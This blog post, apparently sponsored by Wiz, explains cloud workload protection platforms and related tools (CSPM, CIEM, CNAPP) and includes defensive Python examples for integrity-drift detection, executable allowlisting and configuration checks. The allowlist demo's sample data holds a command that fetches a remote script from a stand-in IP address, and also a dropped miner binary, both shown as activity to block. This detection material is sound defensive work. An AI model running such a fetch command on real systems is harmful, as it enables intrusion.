CWPP: A Leader's In-Depth Guide
Introduction
Digital transformation pushes organizations into rapid and prolific workload deployment. As a result, the entire digital ecosystem is becoming more complex. This complexity creates opportunities for hackers. Cloud Workload Protection Platforms (CWPPs) are one of the antidotes to this complexity-driven security chaos. This post will help you understand the evolving role of CWPPs and how they fit into the cloud security ecosystem.
Workload Evolution
Workloads have evolved from a monolithic application residing on a company-owned server to a system of services distributed across multiple platforms owned by a variety of companies. Deployment times have dropped by orders of magnitude, while the lifetime of an individual workload has become far more variable: some run for years, others for seconds. These workloads are also being deployed at an intense rate. As a result, security operations must secure a cross-infrastructure system of constantly changing workloads.
How Did This Happen?
TCP/IP and HTTP, in conjunction with reduced bandwidth, storage, and compute costs, made the World Wide Web possible. One of the salient features of the web is global interconnectivity: a server could be connected to the web and anyone in the world with an internet connection could access it.
This created huge business opportunities. The internet warped into an e-commerce gold rush. The quicker to market, the more money could be made. Enormous pressure was placed on IT to deploy money-making internet services. However, this also opened up huge opportunities for cyber crime.
The pressure to rapidly deploy changed application deployment. Originally, software was created as a monolithic application running on client-owned infrastructure. Deployment was slow and painstaking. Updates, patches, and other changes were difficult. This was too slow and awkward. In the end, the rapid and agile collected the gold.
The reduced costs for compute, storage, and bandwidth accelerated this trend. You could move and store massive amounts of data. The adoption of the smartphone opened up even more revenue opportunities. You could now reach millions of customers 24 hours a day. Of course, this also opened up new frontiers for cybercrime.
Abstraction of Business Logic from Hardware and Software Infrastructure
The monolithic software and hardware architecture was slowing down the gold rush. One of the first remedies was virtualization, which lets multiple operating systems run on the same hardware and reclaims underutilized server capacity, reducing the need to buy and rack new servers for every application.
However, this was only a first step. Applications were still tied to the OS, which caused cross-hardware and cross-OS compatibility issues, and developers still had to deal with OS configuration. Containers reduced these problems. Docker defines a container as “a standard unit of software that packages up code and all its dependencies, so the application runs quickly and reliably from one computing environment to another.” Containers abstract the application from the underlying hardware and OS. Note that containers on a host share its kernel, so they do not isolate workloads as strongly as VMs do; a container escape exposes every other container on that node. You can find a description of the Docker version of container architecture here.
Monolithic Code Separated Into Services and Business Logic
Monolithic code architecture was too cumbersome to meet today’s requirements, so the entire development process needed to change. Services such as the storefront, inventory checking, and shipping-label printing became separate applications that communicate through APIs. This evolved into a microservices architecture, enabled by containers and serverless deployment options. You can find an explanation of AWS microservices here.
The Cloud
The adoption of cloud computing enabled the abstraction of business logic from infrastructure. It also made it easier to implement microservices.
The cloud grew out of Amazon’s decision to rent its computing infrastructure as a service, along with many of its development tools. Other companies, such as Microsoft and Google, followed with cloud services of their own. A major advantage of the cloud is that it enables rapid software deployment with fewer infrastructure and capital constraints. Again, the quicker to market, the more money to be made. You can find a discussion about the advantages and disadvantages of cloud computing here.
Today’s Workload Environment
Workloads are being rapidly deployed across geographically dispersed physical and virtual infrastructures. These applications are networked across the infrastructure with complicated service relationships. An organization can have applications residing on on-premises equipment, AWS, Azure, or other cloud environments. Workloads move between these environments and exchange API calls between cloud and on-premises systems.
Workloads have variable persistence. They appear and disappear based upon the needs of DevOps teams. There is massive pressure to deploy applications rapidly, which can cause human error and complicate policy adherence.
You can deploy workloads in many different environments. They vary from legacy applications running directly on a host OS to small containerized services running in a Kubernetes cluster.
In addition, some workloads are subject to regulatory or industry requirements. HIPAA, PCI DSS, Sarbanes-Oxley, and other frameworks have specific controls you must adhere to.
Security Challenge
The challenge is to secure a plethora of workloads with varying code bases and lifetimes, running across cloud infrastructure that is reachable from the public internet, while causing minimal deployment delays. In addition, you are defending against organized, international cybercrime groups that employ sophisticated and rapidly evolving tooling, and that often enjoy the support or protection of a sovereign state. You need tools designed specifically to defend cloud-native applications.
Accordingly, you must coordinate the activities of the various departments involved in deploying and managing application infrastructure. Separating security into departmental silos is inefficient and does not allow for a holistic view of the security environment. Without integrating these tools, it will be difficult or impossible to detect security threats and breaches. And an extremely complicated environment offers a very broad attack surface to cyber criminals.
Cloud Workload Protection Platforms (CWPPs)
Gartner defines CWPPs as “workload-centric security products that protect server workloads in hybrid, multi-cloud data center environments. CWPPs provide consistent visibility and control for physical machines, virtual machines (VMs), containers, and serverless workloads, regardless of location.”
A cloud workload is any application or service that consumes cloud resources. It can be anything from a monolithic application to a small containerized service. In addition, the application or service can reside on a public cloud, private cloud, or hybrid cloud.
Why CWPP?
No security team can meet organizational deployment demands and maintain security through manual effort alone, given multi-cloud complexity and the rapid pace of change. Siloed tools are ineffective as well, because none of them gives a comprehensive view of the attack surface.
Security staff have to secure many workloads with varying lifetimes, networked via APIs across multiple cloud infrastructures and operating across the full stack. Workload security therefore includes:
Managing workloads deployed across multiple clouds
Assessing compliance in real time
Enforcing policy at scale
Finding software vulnerabilities and patching them
Detecting and understanding changes in workload behavior
Deploying workloads rapidly and securely
Failing to perform these functions creates excessive risk. Cyber attacks are continuous. They relentlessly probe the attack surface, looking for exploitation opportunities. A single unprotected workload can be enough to cause a catastrophe.
CWPP Functions
Gartner lists eight critical CWPP functions:
Hardening, configuration, and vulnerability management
Network firewalling
Visibility
Microsegmentation
System integrity assurance
Application control (allowlisting)
Exploit prevention
Memory protection
Furthermore, these functions need to be implemented and applied automatically. Without automation, security staff will never be able to keep up with the constant change. Cyber criminals use automated attack vectors; therefore, automated defense is essential.
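As an added illustration (this is example code written for this post, not code from the original article or from any CWPP vendor), the following Python script shows two of the functions above in their simplest form: system integrity assurance, as a hash baseline with drift detection, and application control, as an allowlist check on process executions. The workload files, executables, and exec events are all constructed inline so the script runs offline; a real agent would walk the container filesystem and hook process execution on the host instead.

```python
"""Added example of two CWPP-style controls (not vendor code):
  1. System integrity: hash a baseline of files, then report drift
     (added / removed / modified) on the running workload.
  2. Application control: allowlist of executables permitted to run.
All inputs below are constructed in memory so the script runs offline.
"""
import hashlib
from dataclasses import dataclass, field


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: dict[str, bytes]) -> dict[str, str]:
    """Map path -> sha256 of contents. In production this is computed at
    image build time and stored out-of-band, not on the workload itself."""
    return {path: hash_bytes(content) for path, content in files.items()}


def detect_drift(baseline: dict[str, str], current: dict[str, bytes]) -> dict[str, list[str]]:
    """Compare a running workload's files against the immutable baseline."""
    current_hashes = build_baseline(current)
    added = sorted(p for p in current_hashes if p not in baseline)
    removed = sorted(p for p in baseline if p not in current_hashes)
    modified = sorted(
        p for p in baseline if p in current_hashes and current_hashes[p] != baseline[p]
    )
    return {"added": added, "removed": removed, "modified": modified}


@dataclass
class ExecEvent:
    """One process-execution event as an agent would see it (hypothetical shape)."""
    pid: int
    path: str
    argv: list[str] = field(default_factory=list)


def check_exec_allowlist(events: list[ExecEvent], allowlist: set[str]) -> list[ExecEvent]:
    """Return the executions an application-control policy would block."""
    return [e for e in events if e.path not in allowlist]


# Constructed sample workload: the image as built...
BASELINE_FILES = {
    "/app/server.py": b"print('hello')\n",
    "/app/config.yaml": b"port: 8080\n",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
}
# ...and the same workload observed at runtime.
RUNNING_FILES = {
    "/app/server.py": b"print('hello')\n",
    "/app/config.yaml": b"port: 8080\ndebug: true\n",  # modified after deploy
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
    "/tmp/.x/miner": b"\x7fELF...",                    # binary dropped at runtime
}
ALLOWED_EXECUTABLES = {"/usr/bin/python3", "/bin/sh"}
EXEC_EVENTS = [
    ExecEvent(101, "/usr/bin/python3", ["python3", "/app/server.py"]),
    ExecEvent(102, "/tmp/.x/miner", ["miner"]),
    ExecEvent(103, "/usr/bin/curl", ["curl", "http://203.0.113.5/x.sh"]),
]


def run_checks() -> tuple[dict[str, list[str]], list[ExecEvent]]:
    baseline = build_baseline(BASELINE_FILES)
    drift = detect_drift(baseline, RUNNING_FILES)
    blocked = check_exec_allowlist(EXEC_EVENTS, ALLOWED_EXECUTABLES)
    return drift, blocked


if __name__ == "__main__":
    drift, blocked = run_checks()
    print("integrity drift:", drift)
    for e in blocked:
        print(f"BLOCK pid={e.pid} {e.path} argv={e.argv}")
```

The point of the baseline is that it is computed from the image before deployment and kept outside the workload, so a compromise of the running container cannot rewrite it; the allowlist is likewise derived from what the image legitimately needs to execute, which is why an unexpected curl or a binary under /tmp stands out immediately.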
CWPP Benefits
CWPP’s most important benefit is more efficient and effective risk management. Significantly, it enables security staff to support corporate objectives without becoming a choke point in development. It accomplishes this through:
Reduced human error
Easier application scalability
Reduced security breaches
Increased compliance
Redeployment of IT security labor from repetitive tasks to forward-thinking projects
CWPP’s Place in the Security Ecosystem
CWPP functions are essential elements of a successful security program. However, CWPP is only one piece of the security puzzle. Its primary concern is workload security. A solid security program also needs to address infrastructure misconfigurations and compliance issues, and identity management is crucial for controlling access to cloud resources. CWPP does not address these issues.
Cloud Security Posture Management (CSPM)
CSPM assesses and manages cloud infrastructure security risks and compliance issues. Cloud infrastructure is subject to the same complexity issues as workload management: it is largely virtual and is changed through software, which means it can be misconfigured just as quickly. CSPM tools:
Focus on control plane configuration issues, such as network exposure and password and identity policies
Look broadly across the whole cloud infrastructure
Have limited insight into workload risk
Monitor for compliance violations
The benefits of CSPM are rapid assessment of infrastructure misconfigurations that may create security risk, and alerting on potential compliance violations, which supports governance of infrastructure management.
Cloud Infrastructure Entitlement Management (CIEM)
CIEM’s purpose is to manage access and permission levels to cloud services and infrastructure. In a DevOps environment, individuals across multiple departments need access to cloud services. It is critical to keep track of who they are and what they are allowed to do. A unified view of human and machine identities, including the permissions they hold versus the ones they actually use, is essential to reduce security risk.
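To make the CSPM and CIEM descriptions above concrete, here is an added example (written for this post, not the article's own material or any vendor's product) of the kind of rule engine both tool classes run over an account's control-plane configuration: posture checks on password policy, network exposure, and storage, plus entitlement checks for wildcard grants and stale identities. The account snapshot is a constructed, simplified JSON document with a hypothetical schema, not a real provider API response.

```python
"""Added example: a tiny CSPM/CIEM-style rule engine over a cloud account's
control-plane configuration. SNAPSHOT is a constructed document with a
hypothetical schema; a real tool would build it from provider APIs."""
import json

SNAPSHOT = json.loads("""
{
  "password_policy": {"min_length": 8, "require_mfa": false},
  "security_groups": [
    {"id": "sg-web",   "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
    {"id": "sg-admin", "ingress": [{"port": 22,  "cidr": "0.0.0.0/0"}]}
  ],
  "buckets": [
    {"name": "public-assets",    "public": true},
    {"name": "customer-backups", "public": true, "encrypted": false}
  ],
  "identities": [
    {"name": "deploy-bot",     "type": "machine", "actions": ["storage:PutObject"], "last_used_days": 2},
    {"name": "old-contractor", "type": "user",    "actions": ["*"],                 "last_used_days": 120}
  ]
}
""")

ADMIN_PORTS = {22, 3389}  # SSH and RDP should never be open to the world
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}


def check_password_policy(snap: dict) -> list[tuple[str, str, str]]:
    pol = snap["password_policy"]
    findings = []
    if pol["min_length"] < 14:
        findings.append(("HIGH", "password_policy", f"min_length {pol['min_length']} < 14"))
    if not pol["require_mfa"]:
        findings.append(("HIGH", "password_policy", "MFA not required"))
    return findings


def check_network(snap: dict) -> list[tuple[str, str, str]]:
    """Flag administrative ports reachable from any address."""
    findings = []
    for sg in snap["security_groups"]:
        for rule in sg["ingress"]:
            if rule["cidr"] == "0.0.0.0/0" and rule["port"] in ADMIN_PORTS:
                findings.append(("CRITICAL", sg["id"], f"port {rule['port']} open to the internet"))
    return findings


def check_storage(snap: dict) -> list[tuple[str, str, str]]:
    findings = []
    for b in snap["buckets"]:
        if b.get("public"):  # may be intentional; a reviewer must confirm
            findings.append(("HIGH", b["name"], "bucket is public"))
        if not b.get("encrypted", True):
            findings.append(("MEDIUM", b["name"], "encryption at rest disabled"))
    return findings


def check_entitlements(snap: dict, stale_days: int = 90) -> list[tuple[str, str, str]]:
    """CIEM-style checks: wildcard grants and identities that have gone unused."""
    findings = []
    for ident in snap["identities"]:
        if "*" in ident["actions"]:
            findings.append(("CRITICAL", ident["name"], "wildcard permission grants full access"))
        if ident["last_used_days"] > stale_days:
            findings.append(("MEDIUM", ident["name"], f"unused for {ident['last_used_days']} days"))
    return findings


def assess(snap: dict) -> list[tuple[str, str, str]]:
    """Run every check and return findings ordered by severity (stable sort)."""
    findings = []
    for check in (check_password_policy, check_network, check_storage, check_entitlements):
        findings.extend(check(snap))
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f[0]])


if __name__ == "__main__":
    for sev, resource, msg in assess(SNAPSHOT):
        print(f"{sev:8} {resource:18} {msg}")
```

Each finding carries the resource it applies to, which is what lets a CNAPP later correlate a posture finding (port 22 open on sg-admin) with a workload finding (an unpatched service behind that group) and an entitlement finding (an identity that can reach it) into a single attack path.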
Cloud-Native Application Protection Platform (CNAPP)
It’s essential to have CWPP, CSPM, and CIEM capabilities in your security platform. However, you don’t want to integrate the results of individual tools by hand. There are too many teams involved and too many alerts to correlate. Consequently, you’ll expend human effort trying to make sense of results from multiple tools, which slows down problem identification and resolution while distracting staff from more essential problems.
CNAPP is a platform that integrates CWPP, CSPM, and CIEM into a single tool. Wiz, for example, has developed a holistic security solution that integrates the three. Wiz monitors the entire cloud stack automatically, without requiring monitoring agents on cloud workloads. Note that agentless scanning excels at visibility and posture, but cannot by itself perform the runtime controls in Gartner’s list, such as exploit prevention and memory protection; those still need an in-workload component or a platform-level enforcement point.
Conclusion
CWPP is critical to cloud workload security. However, it is only one element of an effective cloud security solution. It loses effectiveness and efficiency if you don’t integrate it with other cloud security tools.
Standalone tools create alert overload, make correlation difficult, consume resources, slow time to resolution, and do not give a full picture of the security stack. The attack surface is too large and changes too often for standalone tools to manage. Time is of the essence in security risk remediation.
CNAPP is an integrated solution that combines the functions of CWPP, CSPM, and CIEM. It gives a complete view of the attack surface and maps security threats throughout the cloud infrastructure. Consequently, decreased security risk is its ultimate benefit. Wiz uses agentless technology to automate and establish a CNAPP security solution. Any organization engaged in cloud-based digital transformation requires such a CNAPP solution to create an effective security perimeter.
This post was written by Marcus McEwen. Marcus is a serial entrepreneur. In 1996 he used a $60,000 investment to build a managed service provider that generated a 25% net profit. His company, Equivoice, was certified as a Cisco Master Service Provider. Equivoice was sold in 2016. After the sale he used his entrepreneurial skills to build an organic farming operation and an Atlanta-based Airbnb business. Marcus is highly respected by his peers for his technical and management skills.